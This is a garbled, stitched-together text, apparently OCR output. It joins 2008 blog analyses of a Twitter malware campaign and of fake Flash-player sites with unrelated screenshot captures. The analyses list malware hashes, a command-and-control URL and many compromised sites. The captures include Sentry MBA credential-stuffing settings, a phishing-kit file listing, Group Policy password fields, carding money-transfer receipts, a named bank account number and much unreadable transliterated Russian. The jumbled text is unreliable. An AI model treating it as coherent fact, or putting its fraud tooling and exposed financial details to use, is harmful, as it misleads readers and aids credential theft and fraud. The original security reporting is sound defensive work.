
[14]XSS Vulnerabilities in E-banking Sites 
[15]The Current State of Web Application Worms 
[16]gOt XSSed? 

[17]Web Application Email Harvesting Worm 
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. http://www. twitpwn. com/2008/08/coming-up-malware-on-twitter .htm 


. http://www.viruslist .com/en/weblog?weblogid=208187551 
. http://blogs.guardian.co.uk/technology/2008/08/05/twiters_trojan_problem.htm 


. http://www. techcrunch. com/2008/07/27/who-is- johng77536-and-how-did-he-game-twitter/ 


. http: //0x000000. com/index . php?i=512&bin=1000000000 


. http://ha.ckers. org/blog/20071220/orkut-xss-worm 


. http://en. wikipedia. org/wiki/Samy_%28XSS%29 


1 
2 
3 
4 
5. http://en.wikipedia. org/wiki/Cross-site_request_forger 
6 
7 
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. http://securitylabs.websense.com/content/Alerts/1319.aspx 
10. http://blogs.securiteam. com/index. php/archives/786 


. http://sirdarckcat .blogspot .com/2007/12/making-social-network-xss-worm-hi5com.htm 
12. http://blogs.zdnet .com/security/?p=148 
13. http://ddanchev. blogspot .com/2007/05/xss-planet .htm 


. http://ddanchev. blogspot .com/2007/02/xss-vulnerabilities-in-e-banking-sites.htm 


. http://ddanchev. blogspot .com/2006/05/current-state-of-web-application-worms.htm 


16. http://ddanchev. blogspot .com/2007/06/g0t-xssed.htm 


. http://ddanchev. blogspot .com/2006/06/web-application-email-harvesting-worm.htm 
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cn video_kelly_key 


Video Pornografico da Cantora Kelly key.. 
http://player-videos-youtub... 


4 days ago from web 


video kelty key Video Pomogafico da Cantora Kelty key. Mitp.player-video- 


In [1]what appears to be a lone gunman [2]malware campaign - where the malware spreader 
even left his email address within the binary - the now down [3] Twitter malware campaign 
managed to attract only 69 followers before it has shut down, [4]using a trivial approach for 
launching an XSS worm - [5]Cross-site request forgery (CSRF). More info : 


"This week it’s Twitter’s turn to host an attack - one that is targeting both Twitter users 
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and the Internet community at large. In this case it’s a malicious Twitter profile twit- 
ter.com/[skip]/ with a name that is Portuguese for ‘pretty rabbit’ which has a photo advertising 
a video with girls posted. 


This profile has obviously been created especially for infecting users, as there is no other 
data except the photo, which contains the link to the video. If you click on the link, you get 
a window that shows the progress of an automatic download of a so-called new version of 
Adobe Flash which is supposedly required to watch the video. You end up with a file labeled 
Adobe Flash (it’s a fake) on your machine; a technique that is currently very popular." 


Video Pornografico da Cantora Kelly key.. 
http://player-video-youtube... 


08:03 PM July 12, 2008 from web 


Yio..o Cameras 


Let’s analyze the campaign before it was shut down. The original Twitter account used 
twitter.com/video kelly key basically included a link to player-video-youtube.sytes.net 
(204.16.252.98) which was using a URL shortening service fly2.ws/NiIOMN3 in order to 
redirect to the banker malware located at freewebtown.com/construimagens/ Play-video- 
youtube.kelly-key.com. It’s detection rate is as follows : 


Scanners Result: 14/36 (38.89 %) 
Trojan-Spy.Win32.Banker.caw 

File size: 88064 bytes 

MD5...: 25600af502758ca992b9e7fff3739def 


SHAI1..: 9262ca501lef388e0fe42c50a3d002ddbd6e254f2 
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Twitter isn’t an exception to the realistic potential for [6]XSS worms though CSRF that could af- 
fect each and every Web 2.0 service, which as a matter of fact have all suffered such attempts, 
namely, [7]Orkut, [8]MySpace (as well as the [9]QuickTime XSS flaw), [10]GaiaOnline, [11]Hi5, 
and most recently the [12]XSS worm at Justin.tv, demonstrate that trivial vulnerabilities come 
handy for what’s to turn into a major security incident if not taken care of promptly. 


Related posts: 

[13]XSS The Planet 

[14]XSS Vulnerabilities in E-banking Sites 
[15]The Current State of Web Application Worms 
[16]gOt XSSed? 


[17]Web Application Email Harvesting Worm 


1. http://www.twitpwn.com/2008/08/coming-up-malware-on-twitter.htm 
2. http://www.viruslist .com/en/weblog?weblogid=208187551 
3. http://blogs. guardian. co.uk/technology/2008/08/05/twiters_trojan_problem.htm 


4. http://www.techcrunch. com/2008/07/27/who- is- johng77536-and-how-did-he-game-twitter/ 
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5. http: //en.wikipedia.org/wiki/Cross-site_request_forgery 
6. http: //0x000000. com/index. php?i=512&bin=1000000000 
7. http: //ha.ckers.org/blog/20071220/orkut-xss-worm 
8. http: //en.wikipedia.org/wiki/Samy_7%28XSS%29 

9. http://securitylabs .websense.com/content/Alerts/1319.aspx 

10. http://blogs.securiteam.com/index.php/archives/786 

11. http://sirdarckcat .blogspot.com/2007/12/making-social-network-xss-worm-hi5dcom. html 
12. http://blogs.zdnet .com/security/?p=1487 

13. http://ddanchev.blogspot .com/2007/05/xss-planet.html 

14. http: //ddanchev.blogspot.com/2007/02/xss-vulnerabilities-in-e-banking-sites.html 
15. http: //ddanchev.blogspot.com/2006/05/current-state-of-web-application-worms. html 
16. http: //ddanchev.blogspot .com/2007/06/g0t-xssed. html 

17. http: //ddanchev.blogspot.com/2006/06/web-application-email-harvesting-worm.html 


4.8.5 Compromised Web Servers Serving Fake Flash Players (2008-08-05 21:47) 
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attacker to locally host a malicious campaign is nothing new. In fact, malicious attackers have 
been building so much confidence in this risk-forwarding process of hosting their campaigns, 
that they would start actively spamming the links residing within low-profile legitimate sites 
across the web. 


This campaign serving fake flash players is getting so prevalent these days due to the 
multiple spamming approaches used, that it’s hard not to notice it - and expose it. From 
a strategic perspective, having a legitimate low-profile site - of course with the obvious 
exceptions being on purposely registered for malicious purposes within the participating sites 
- hosting your malicious campaign is pretty creative in terms of forwarding the responsibility, 
and the eventual blocking of a legitimate site to the its owner. As far as the owner’s are 
concerned, it appears that some of them are already seeing the malware page popping-up on 
the top of their daily traffic stats, and have taken measures to remove it. 


Moreover, [1]Adobe’s Product Security Incident Response Team (PSIRT) issued a warning 
notice about the attack yesterday, which could come handy if the [2]attackers weren’t taking 
advantage of client-side vulnerabilities, putting the unware end user is a situation where he 
[3]wouldn’t even receive a download dialog : 


"We have seen coverage from the security community of a worm on popular social networking 
sites that is using social engineering lures to get users to install a piece of malware. According 
to the reports, the worm posts comments on these sites that include links to a fake site. If the 
link is followed, users are told they need to update their Flash Player. The installer, posted 
on a malicious site, of course installs malware instead of Flash Player.We’d like to take this 
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opportunity to reiterate the importance of validating installers and updates before installing 
them. First off, do not download Flash Player from a site other than adobe.com - you can 
find the link for downloading Flash Player here. This goes for any piece of software (Reader, 
Windows Media Player, Quicktime, etc.) - if you get a notice to update, it’s not a bad idea 
to go directly to the site of the software vendor and download the update directly from the 
source. If the download is from an unfamiliar URL or an IP address, you should be suspicious." 
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The structure of the malware campaign is pretty static, with several exceptions where they 
also take advange of client-side vulnerabilities (Real player exploit) attempting to automati- 
cally deliver the fake flash update or player depending on the campaign. On each and every 
site, there are dnd.js and masterjs scripts shich serve the rogue download window, and 
another .html file, where an IFRAME attempts to access the traffic management command 
and control, in a random URL it was 207.10.234.217/cgi-bin/index.cgi?user200. A sample list 
of participating URLs, most of which are still active and running : 
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BAHKOB, M OTSBIBOB HA APYTUX ABTOPATETHDIX MJIOWARKAX. 


HK OJHOTO APGHTPAMKA H NPETEHSHHL, 3A BCE BPEMA HAWEM PABOTHI. ; 


Mbl SHAEM BCE N1PO ENROLL, H TO YTO C HAM CBASAHO, H OSTOMY MbI BCEFA NOAGEPEM JA BAC NOAXOLAWHA TOBAP. 
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wowhard.baewha .ac.kr/watchit.html 
dianagraf .es/default.html 
komma10-thueringen .de/hotnews.html 
miavassilev .com/stream.html 
swampgiants .com/watchit.html 
compagniedephalsbourg .com/fresh.html 
arla-rc .net/hotnews.html 

salacopernico .es/watchit.html 

drfinster .de/checkit.html 
healthylifehypnotherapy .com/stream.html 
ecotrike-bg .com/fresh. html 

paoepalavra .org/watchit.html 
jureplaninc-sp .com/topnews.html 
fichte-lintfort .de/default.html 
hergert-band .de/checkit.html 

izliyorum .org/topnews.html 

lideka .com/stream. html 
athena-digitaldesign .com.tw/hotnews.html 
e-paso .pl/stream.html 

colombeblanche .org/stream.html 


teatromalasa .es/watchit.html 
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gn0o0og0o0oogooOooo0oogocConoon ooo 000 


Date 
10 Nov 2014 
10 Nov 2014 
10 Nov 2014 
10 Nov 2014 
10 Nov 2014 
10 Nov 2014 
10 Now 2014 
10 Nov 2014 
10 Now 2014 
10 Nov 2014 
10 Nov 2014 
10 Nov 2014 
10 Nov 2014 
10 Nov 2014 
10 Now 2014 
10 Nov 2014 
10 Nov 2014 
10 Now 2014 
10 Nov 2014 
10 Nov 2014 


HEEEEE EEE ETE EEE 
PRREREEEREEREEREERRE! 


i 
| 


~$70.00 


Net amount 
$73.03 USD 
-$73.03 USD 
-$73.03 USD 
$41.86 USD 
$73.03 USD 
-$73.03 USO 
$73.03 USO 
-$73.03 USO 
$73.03 USD 
-$6264USO 
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APEHDIA TELEGRAM BOTOB 
OT POCKOMHAQ3SOPA 


Dem eet omareecnot pone 
BIGAEE TORIPOR HH DET CRATT AR pan Cot Eee 


Nemotpectn yorprn 
TelegremBct @estenBot Totegracs @RentService 
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2003 VOLVO VNL @ *== 


Lo} #20)5¢615 patails) | may 
Doc Typé: MS-CERTRICATE OF TTL’ () @ 
Odometer: 764.699 m (ACTUAL) @ 
Highlights: Run aed Ome@ 

Primary Oaenage: MINOR DENTISCRATC 
Secondary Damage: 

Est. Retail Vatwe: 


c Lot & 0750615 


2003 VOLVO a 


C smoot Ove $10,800 USD 


Location & Delivery 
Ln 


SOUTH 


Cwrsconsigh SP Aaya 


a Cire anges may 260% at me of DONS 
“i 
=o» 
: > 
Notes: 


Share «Prev | GacktoResuts | Next> 


id Information 

Bid Status: Never Bid 

Sale Status: Minium id @ 
Current tet: $425 USD 

ee uet) @ 


Your Max Bit: $ 


eter Reserve Not 


v vat This Means 


SEMPHES 


Lanefitem / Grid/Row: Lane A. tem 851 
Sate Date: Thu. Apr 23, 2015 


ASS to Calendar 
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2008 Ford MUSTANG SHELBY GT500 


Congratulations on your purchase! 


n $78,900 
$75 

TOTAL $273,275 
Transpontatios sy to Ready Log $e 


Sere Teorey 


noun 


cl 


mesporte.digiweb.com .br/stream.html 
bistrodavila.com .br/watchit.html 
hausfeld-solar .de/topnews.html 
nakedinbed.co .uk/topnews.html 
csr.imb .br/stream.html 
herion-architekten .de/default.html 
jbhumet .com/default.html 

gruppouni .com/hotnews.html 

francex .net/fresh.html 

galvatoledo .com/topnews.html 
cmeedilizia .eu/topnews.html 

kroenert .name/default.html 
textilhogarnovadecor .com/topnews.html 
keithcrook .com/stream.html 
elpatiodejesusmaria .com/checkit. html 
neticon .pl/hotnews.html 
malerbetrieb-pelzer .de/hotnews.html 
easterstreet .de/fresh.html 
piogiovannini .com.ar/watchit.html 
ser-all .com/topnews.html 
petzold-dieter .de/checkit.html 
beatmung-brandenburg .de/checkit.html 
ossuzio .com/watchit.html 
teatromalasa .es/watchit.html 


vuelosultimahora .com/topnews.html 
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n 2 t 


onion 
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Son wait wp while soineloody make 


You an of for you cant refuse 


Ect npexpactpal uinpm Memento, tam me coGerrua BeyaioTca 6 OGpaTHom nopaaKe) 
A peusin NonpoSosars ceOar B Taxom KAHpe, H NpeseHTyO Bam HeHonbwy 3apHCOBKy O TOM, KAK A NPOBEN AHBAPS, HO RE B PAIPEIE OKOHYAHIEA MyTEWEC TEI! 


Kena Tax xorena nepeedi knacc oT Cepaaixa, ¥To comacunacy CYTKV nposect 8 npenenax asponopta DpanxipypTa, KOTOpHall Ha Mantel moMenT 
NpegcTaanrer 13 ceGn orpommbalt somOet-neng! 


Ha nec aaponopr, na Kyyy Tepeamanon!!! , rocnowa Jhodtransa oTepewna Bcero Nw 2 NayrKa - 6 KOTOPRIX AAIOT NOXPATD B NPAMOM CébICNe - QbipKy OT 
GyGneixa, 1 3anvT STO Bce NpeKpacHo HEMeyKON WTHNS-BoTep 


V1 TO, 370 We NPAM B NayrONe, 2 HyNDO CNYCKATHCA 3a CFO NPEAEND! M wPaTo Ha CKameiee COBCTBEHHO, NOTOMy 4TO ywTep-Nonmayar H Npasunal 


Nepecevenne oT resiTa K NAYHOXY OVEHS WACTO 3BHMMBET OKONO 4AC8, NOKA NPONew. Mo TepMINANy, NOKA CAQEWS Ha MeEXTePMEIHANeHbMi Noeay, Noxa Npolew> 
CEKDIOPHT 4EK .. 2 HEMUAM FE AENATD HEXyil, Ori CTOAT-ThiemOTCA C Apyt Apyrom TpasaT Gactet Koma npimonet xEpTBa - STO NoNHeTwWaR KOMNINEKcHaA 
NPopepKa CO BCeMmM BOIMORO DIN DeBalicamM, GyTheNGt JANVOOBAOTCA B CHOUMANDHbsT BKANMIATOP LONONMTENbHO, TeEOA OGbICKMBAIOT, NPOBEPAIOT Ha HAPKOTY HV 
SIpbINaTKY KOPOVE KAK NONCAEHO. 


[lo CeKDOpHTHt rat BORD! He KyTetTD, ret GynouKy ChecTy 

Ho, © Goi Goin ne Komoxos - Axtaya, “Tob! He NPHAYMaTD BeiKKOA. B NepBom MNACCe A Them CTOapReccam 1 NEPCepy (KTO He SHBET - STO yMbIBANDHMKOS 
HANANDIGIK 1 MONANOK KOMI © CaMonéTe) noBeAaN MyYCTHyIO HCTOpHHO (NDaBAHBYyIO) O TOM, ¥TO, HD TEpMMiaNa MbI ONT He Momem - Kopona. B nayrone ne 
KOPMAT HM HE MOOT, a pefic Haw AOMON ax 3ABTPa, POBHO Wepes CyTK 


B wore npodur Tos HCTOpHM TaKoB - BCE 4TO Mbs He AOMMNA B CanoHe No Blue Label. Bot Taxan Bor nxAupean GyThINOUKa wannancKoro euyt NO 190 Eepexoe - 
yenaa 


17677 


Simple Backlink Indexer 


0°o 
Ce & bb 
Style Store 


Indexer 


Success Failure 


12810 4350 
a Sa 


> www. alexa.com (17T56/T7T60) A 
[12:00:40 AM]: Success : waww.alexa.com (17157/17160) 
{12:00:40 AM]: Success : www.alexa.com (17158/17160) 


URL 


(12:00:50 AM]: Finish v 


Version: 20.9.18 
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Fosopar ecau 100$ kK Tem “TO 3annaTMAM TO COrnacHb! 21:06 YW 


STaKOBAaTS BCE PABHO HE CHOKHO 95-9 


Aa TaM ITOFO 2aCPaHUa ZAMYYAH 9. > 


Ecav 3aBTpa OCTanbHOe CKMHYT yCTpoMT? Yenosek Wiac 3aHAT 
npocro. 21:08 W 


Hy YCTPOMT KOHEUHO :) HO A MOY MW NOZOXKAATH) 9) nn 


ANPOCTO TYT ANA 3aKyNa aTy CKEMY MPMAYMAN) > ).o0 
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Mobi pa6Sotaem !!! 
Nossunncb Germany !!! 


Ty 
BET ILL) 


i 
ererrrriis/////4 


ii 
\ 


ICQ: 374214681 
dediks82@mail.ru 
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zelenaratolest .cz/pornotube/index1.htm 
ambulatoriovirtuale .it/topnews.html 
10a3 .ru/index1.php 

izliyorum .org/topnews.html 
collectedthoughts .co.uk/index12.html 
afg .es/topnews.html 

albertruiz .net/topnews.html 
bielizna.tgory .pl/topnews.html 
blueseven.com .br/topnews.html 
bollettinogiuridicosanitario .it/topnews.html 
caprilchamonix.com .br/topnews.html 
carlolongarini .it/topnews.html 
champimousse .com/topnews.html 
cheviot.org .nz/topnews.html 

contrapie .com/topnews.html 

gruppouni .com/topnews.html 
hausfeld-solar .de/topnews.html 
herbatele .com/topnews.html 
houseincostaricaforsale .com/topnews.html 
alim.co .il/topnews.html 

allevatoritrotto .it/topnews.html 

amafe .org/topnews.html 
ambulatoriovirtuale .it/topnews.html 
atelier-de-loulou .fr/topnews.html 


automoviliaria .es/topnews.html 
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OQ Just Al 


POCCMUCKUN pbIHOK pa3roBopHoro Al, 
YaT-60TOB MW MHTeNNeKTYasIbHbIX 
acCUCTeHTOB 


O6bem pbikkKa XM NporHo3 AO 2023 (mnH py6.) 


18 000 33 000 
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Espaficol | internationalRates | Activate YourDevice | Support 


ib PHONES & PLANS DOWNLOAD THE FREE APP LOGIN {SIGN UP FREE ) 


Say goodbye to large phone bills 
Save and do more with TextNow 


Join the millions of people saving money by 
switching to TextNow 
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MEGALODON}|| 1P 


& Execute 


& Statistics 
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Aboutus | FAQ's | Contactus 


ICQ 66444488 


Dear Darrel 


Your Payoneer Prepaid debit MasterCard® has been loaded with $5000.00. 
With your Prepaid debit MasterCard®, you can: 


e Withdraw money from ATMs around the world. 
e Use the card in stores. 
e Make nurchases over the internet at online retailers 


For Cardh 


Access your account page to edit 
your profie, check your 
transaction history and card 
balance. 


My Account 


For Card Loaders 


Load the card yourself, using 
either cred# or debit cards, 
electronic checks or cash. 


ACCOUNT 


(~) Premium Checking 


ROUTING NUMBER 


091302966 


ACCOUNT NUMBER 30412 


Tap above to copy 


Account Holder 


Issuing Bank 


Bank Address 


Voided Check 


Abdul Halifa 


Choice Financial Group @® 


4501 23rd Ave 
South Fargo ND 58104 


RESOURCES 
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ACCOUNT 


(~) Premium Checking 


ROUTING NUMBER 


091302966 


ACCOUNT NUMBER 30412 


Tap above to copy 


Account Holder 


Issuing Bank 


Bank Address 


Voided Check 


Abdul Halifa 
Choice Financial Group @® 


4501 23rd Ave 
South Fargo ND 58104 


RESOURCES 


autoreserve .fr/topnews.html 

izliyorum .org/topnews.html 
jureplaninc-sp .com/topnews.html 
kwhgs .ca/topnews.html 
lapiramidecoslada .es/topnews.html 
last-minute-reisen-4u .de/topnews.html 
marcadina .fr/topnews.html 

maremax .it/topnews.html 
corradiproject .info/topnews.html 
dantealighieriasturias .es/topnews.html 
deliriuslaspalmas .com/topnews.html 
ecchoppers .co.za/topnews.html 
elianacaminada .net/topnews.html 
fonavistas .com/topnews.html 
fraemma .com/topnews.html 
fundmyira .com/topnews.html 
galvatoledo .com/topnews.html 
grafisch-ontwerpburo .nl/topnews.html 
markmaverick .com/topnews.html 
micela .info/topnews.html 
motoclubnosvamos .com/topnews.html 
nebottorrella .com/topnews.html 
negozistore .it/topnews.html 

neticon .pl/topnews.html 


norbert-leifheit.gmxhome .de/topnews.html 
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Login here... Or sign up ove 


* Username: aaaaaaa Nosp 
. 7 hyphe 


The username/password combination you 
entered was invalid Username: 


Sentry MBA 14 


5 


Update Bruteforcer Keys Global Key Phrases / Use Global Keys 


History - : : u 
TF Bruteforces is not running 

Progression P 
About —_ 
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where is redrict key. 

Like in Mehosting there Is My account setting, 
Account info something like that in this Main page is 
the redrict key. 

And welcome is the redrict success key. 


mano 


tty ewers beats 


¢, A20el NONeITaTe CUACTRe # SeIPSaTeCR vO TOpO,ACKOd CyeTe. Mork eeGop nas a Ban, ecrecteesno & Nepal pas Geinw COmMenne HW Ope 


© NPOSeccmonannoue 4H NOMMAMaMHM KAKeHTA. 4TO KacaeTCR Caworo OTAMxe Bce 


owset 1a 3.5 “aca. Ho 8 “Tore NoseT 


cee 


Ow20 HE TAK PAAYRMO, KOK KOTEROCR TAK KAK 0 AGH) MaNaAS MyTewecTeHe HaGupare COODOTH CvauKee Octnas Oype. KOTOpEeS JaAep~ase Hew 


onpoc 


MO SECEAEHMND HE BOSHHKAO, nOTS # Gata rayGoKan HOU & Tex Kpasx. Cau 9 


WEA TARAKO w GES SAQeEPREK 6 ZatereiWeM NO NpHelay 6 NepeDd OTeAD HKacnx 


np 


WHOe 


OTe*> CUS NO A Napa-Tpotca « NpHAaraercs Mime. 


DULEHH PERCE OT WHOFHK SOWIKOMMZHHA WH NOAA. NaHnKe. 


PURTHE HOGS 


Nate we Over 


B nepeom oTene mman Bancem » SGyKBamero 24m 3-4, nmoc Cras Nocty 


nepespouvpoear GuszeTe ZOWOA Ha Gosee Panene wncta, O Wem ENDOVeN HH Day He NOMare 


me Ged were, HO Apy 


notearogapetT. a NpeAcctasseeuwd OTAex Mpo 


Hy # aamepunas CoA we Pacocaa, euye par xOVy 
mennyr cen 


VOC SELMOT TEGR COPSTH TEC! HE CHEAYOUIHA PED K HeMY 


Ps. Naps SHACE C OCTpPOBa KaK 6c 


Bet MaRceRnS wate Bp eee He & CHIME © HieM MyTeSeC Ee eects eotwe p22, Cet “ Rett x COPED, mo MD Saet Re & wide & Oct Ther tet © esoneThce Coptecou Cepack wt we NomaAes 
a 3 ne Varasrte acy 3b eben, a ee ° ws 38 4S Soe £0 meee FY ¥ 220 . anys + Cotes Shere 
Oued ene RAbepCeS 5 moe cre get ropeus Manere tae : ‘2 tne te ee tesco Lamne BN . 2 cory thee 
. trom ” tenet aromee me core ‘ pot MOY . ’ seancnws 
‘ — . . ~yene ee oun yarns Oper . somtyt ~ . - «eden, nema — “ + nee . 
. THER 92 THOMCOE ecu r t pirca =a ncORR 
DICKTDOV BAe UTD mm 7 use er ™ 7 Pe ¢ 
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OTAoxHynv Mei wHkapHo! Bnarogapa komange Cepxnxa! Pexomenayw! 


Brepapie o6parunnce K Cepaamy 3a oTenem 8 Typuit, KaK KE MHEe NOHPABHNCA ux NoAxXoA K KNMenTam! Bcema Ha CBA, O4Erb KOMNETEHTHO 
OOWaIOTCA-OQHO yQoBonbcTeHe! 

Visnayaneio mbi nog_obpann oTenb 1 onnaTiwm: Cepaaixy, Ho €ro CAenaTe He NonyweNOch, Cepaam Nam Cpasy OTNPasit aNbTepHaTHBHbi BapHaHT 
Orena Jhoxc, KoTOpbIt CTOHN 3Ha“eTTenbHO QOpome! 

Ho mei never Ha f] P ceinowxa, nosTomy Cepxnk 8 YeCcTh NpasqnuKa CAenan Ham ONEHb npinnyo cxnacy! 3a “To emy orpomman 
GnaromapHocTy! 

Sacenemve Npowno over GeicTpo, 6e3 ecaKinx Bonpocos! 

nu BOT Mbi 8 LUVIKAPHOM orene 6 Genexe! Ena, Hanutxn (nonpoGosans mei nowrn Bcé Ss wamnanHcKoe pexoll, Xexveccit, Yepac, Texna) 
nurranvne wiiKkapHoe! fletam npocto pai! (mopomenoe, obangennbie NECepTo!, game Zone, axBaNnapK, ATTPAaKLHOr!) Bkax cKasan pedéHox- 3To 
nywwee flere Poxgerial 3a “To of scero cepaua Gnarogapw Cepmwuxal 

Bescenenme Taxxe 63 eAnHoro Bonpoca!l Cepx ecema na CaAg, CnpausBan KaK OTAbIKAeEM, BCé Mit Xopowo! Hy 3To Camel BbICOKM CEPBHIC! 
PeGata, nonbsyliTecb BOSMOKHOCTAMM, OTAbIxaliTe 8 KPyTbIX OTENAX - C OTNMNHDEMH WeHaMit H YPOBHEM Cepxal 


B cneagynouyo Hawy noesaxy O6asaTenbHo OOpaTiauca ewe! Cnacu6o Bam Pe6aral 
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Kak nocTponte kapeepy 6 xuBepGesonacnoctu 


Ecnw ap xwsete @ CWA, wayynte taxne pecypcni, Kax: 
Dice, Craigslist, Glassdoor, Linkedin 1 np. 
B BenuxoSépuranun - JobServe, CyberSecurityJobsite, CWJobs « ap. 


Viaywwre wmeougneca BaKaHCHM M MHCbopMaLNO, AOCTyNHyIO Ha Be6-CaiiTax NO Haamy 
cneunanwctos 8 o6nactw wHcbopmaumoHHoR GesonacMoc™. 


Crmcok Tonosbix Kanposbix arenTcTe 8 OGnactu knGepGesonacHocT: 
hitps//www.csooniine com/articie’30 13033/it-careers/security-recruiter-directory him! 


Barclays Simpson syinycxaet exeromenh ananvs pemKa, KOTOpEI NOMORET BAM NOHATD, 
4TO #3 Ce6A NPeACTABNMOT Paanwere CheUuMAaNDHOCT™ B HHAyCTPHM KHGepGesoNacHOCTH: 


AKTHBHO NbITROTCR JAKPLIBATS MMEIOUNMECA OTKPEITEIG NOSMUMM. ECnu y BAC HET BLICwerO 
O6pasosanna, Bhi MOxKETe YCReWHO NpOwTH BHPTyAaNDHOe OGy4eHHe H NONyYHTD paGory. 


Si Gti nopexomennosan Bam Npofitn Vi nonHOCTHIO yCROHTS ComepxXMMOe 
Tlomoro xypca no nBepSesonacnoctw” (Towa 1-4). 


Ecrvt abt CMOxKETE NPOMEMONCTPHPOBATS yposer> 3HaHi M HaBDKOB M3 STOTO OHMaMM KypCa, 
pasoronaTend O6a32aTeNeHo samnTepecyerca Bau! 


cyl 
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Nome hts thee + HTTP poo Sait? - 10CK4 


a Bus ty dais 
Semmemnen press ape compeenes EMEP Ben Socks Buns Socks 
‘ eee nn pened emer AEE ES ee . - 
= a he aes ee Oe ND RE Ge fe He P, 


Dymo penmpres omen i tas 
ee os 
ee 


Tee Pees patna nes pe mapas natn bey = aed 
SR ae ae es a meee tem oe Lem eee 


© SPCR rogram + | § (Beta) em Seoctoped m Pe 
AS teh Wetend Seni? 


. : Nem Sted Set + HTTP ree MTP = LOCKS pre 


i ieecapeeaaeaain Bus tey 
Remmemnen peony ape cmpeenes MIP Bhar Sec " 

* Seen nay mepennedl cme Te ES ee i 
ee ee ¢ 


Symmons pamper seen m mas 
Siw meme nee ge eneee epee | me meee ees has fermen: emeeee. 


a 
Te ae nec oe ee ame me ey et 
TR arr mean ns Fa eee pee oF ee eee 


© SPDCRaad progam + | 5 Bea) wu draped 2 tO 
AS teh Wetend Seni? 
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segelclub-honau .de/topnews.html 
snmobilya .com/topnews.html 

splashcor .com.br/topnews.html 
stephanmager .gmxhome.de/topnews.html 
svcanvas .com/topnews.html 
tautau.web .simplesnet.pt/topnews.html 
textilhogarnovadecor .com/topnews.html 
theflorist4u .com/topnews.html 
thewindsorhotel .it/topnews.html 
vuelosultimahora .com/topnews.html 
aliarzani .de/topnews.html 
ambermarketing .com/topnews.html 
arnold82.gmxhome .de/topnews.html 
ocoartefatos.com .br/topnews.html 
omdconsulting .es/topnews.html 
parapendiolestreghe .it/topnews.html 
positive-begegnungen .de/topnews.html 
projetsoft .net/topnews.html 
rbc.gmxhome .de/topnews.html 
beatmung-sachsen .eu/topnews.html 
campodifiori .it/topnews.html 

clickjava .net/topnews.html 

cmeedilizia .eu/topnews.html 

dammer .info/topnews.html 


embedded-silicon .de/topnews.html 
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> Amazon Japan Scampage 2020 


“~ 


Name 


1 mobile 

B pc 

@ 404.htmI 

J) dbconfig.php 
) emailconfig.php 
@ index.ntmi 

@) index.php 


v Ov 
Date modified 


9/1/2020 5:02 PM 
9/1/2020 5:02 PM 
8/22/2020 8:58 PM 
3/20/2020 6:20 AM 
3/18/2020 10:29 AM 
8/22/2020 8:58 PM 
3/18/2020 6:20 AM 


Search Amazon Japan Scampa... 


Type 


File folder 
File folder 


Microsoft Edge HT... 


PHP File 
PHP File 


Microsoft Edge HT... 


PHP File 


Size 


1! 
11 
11 
11 
7| 


1) *emailconfig.php - Notepad 


File Edit Format View Help 


<?php 


$Email = ""; // Your Email Here :) 


$Emails = array( 
"Your Mail Other " 
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version encoding 
clsid 
clsid= 
image changed 
userContext 


removePolicy= 
P rties action: fullName= description 


cpassword= 
changeLogon noChange neverExpires acctDisabled 
userName- >< er 
clsid 
image= changed= uid=- 


perties action fullName description 


cpassword changeLogon noChange 


neverExpires: acctDisabled serName= 


Mining Distribution & Circulating Supply 


Source: Coin Metrics Network Data Pro 


Aiddng Bunejnoig O19 
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JATTP scanner (Open port 00 subeet scanner) 


Estimated delivery Friday, 30. Jun. 2017 - Monday, 3. Jul. 2017 


' HTC VIVE Contact aelier 
wal Item price £ 599.99 
Item number > 


Delivery service Other 48h courier 
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Kak “acto ut Geasaer, acnomHin 06 OT3nIBE B NPEAABEPH BOSMONHOFO HOBOTO 3aKa3a 
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Shoxcoewie anapTamentd! Ha Ae HEQErt 6 CTOMMYe ONO M3 CTpan Esponts Kaxom, casotpure Ha oro. 

Cnacv6o. [lo noenx ecTpes 


Beary terry ery ee eee et ty oO we 
Pee? ax dotarme > Peetirg > 
$0,00 USD 7 Sa 


ete 


” - 210.00 
PeaP ol Etter Mewmere wnat > ~ ween curt oem ye 
$4,327.00 
poate (nb 
t —s Conptenns > 
7. See “$117.95 
Bathe wed corde > po mc 27.6 
2 Wnt ad One 
i aie x - Ye rere Canary ave me $114.85 
<n S Rtn $20.00 


17717 


17718 


From Bitcoin to Satoshis 


Source: Coin Metrics Network Data Pro 
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From Bitcoin to Satoshis 


Source: Coin Metrics Network Data Pro 
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Poy Xbox One S 1 1B Console - Battlefield 1 Special Edition Bundie 


Shupping status 


Not shipped 


Order surmmary 


US $239.99 
antity j 1 


napping Free 
Economy Shipping 


Apr-06-17, 11:04:48 PDT 


ation United States, United States 


Poy Xbox One S 116 Console - Battlefiekd 1 Special Edition Bundle 
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CARL NOLAN 
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Transaction Sent ‘Transaction Processing Money Arrived 


Track a Transfer Print Summary 


Current Status: The money transfer is ready to be picked up at an Agent 
location in your Receivers area. 


Service: Money in Minutes 


Tracking “XAKEB RD, ca rd i n g .WS 


Date Sent’ 22-11-2015 
Sent To: Pakistan 
Amount Sent: 1220.00 Canadian Dollar 
Amount Received: 124969.11 Pakistan Rupee 


Currency Excnend® Exchange Rate of 1 Canadian Dollar = 1024336926 Pakistan Rupee. @ 


Check status of another transfer 
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x 
Hactpoiet Cetp 
Pasmewenne nan oceTueit 
C:\Users\Ddani Documents \Arduino | 0630p 
Ate penakTops: To ynonuaes#0 v_ (Hypmen nepesanyox Arduino IDE) 
Pasmep wpespra: 2 | 
Macwra6 untendesica: YD Astomatexa L 100 5% (Hymex nepesanyox Arduino IDE) 
NoxasaTe nonposHisi exison: []Koemmassa [_] 3arpysxa 
Coobwenna Konnunstopa: — Hysero v| 
[)Moxasats Homepa crpok 


PonoratrenoHie Copunk Ann Menenxepa nnar: | 


[pyre Hactpoiect momar pemaxTHpoBaTS MenocpencTBenno B daine: 
C:\sers\Pdani\AppData \Local\Arduino 15\preferences. txt 
(roreKo Kora Arduino IDE ne sanyueria) 
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BS Becnposognan guarnoctuka Dain [lipaspka OKHO CnpaBKa 


=? 


BecnposoaHas AMarHoctuka 


Bsegenne 


Nporpamma «BecnposogHan QuarHoctuKka» cny KT ann 
O6HapyxXeHMA THNMYHbIX NPOGNem Cc GecnpoBopHbin 
nogKniovenvem. Ova TakoKe BLINONHAET MOHMTOPHHT 
6ecnposopHoro nopknioyeHna B Yennx O6bHapyxKeHuA 


nepe6oes. 


No 3aBepwermu paGorei c aTMM ACCUCTeHTOM OTHeT 
AmarHoctuKu 6GynerT coxpaHex Ha PaGovem crone. Otnpasnan 
oTyet 6 Apple, Bei cornawaetect c ucnonbsoBaHvem 
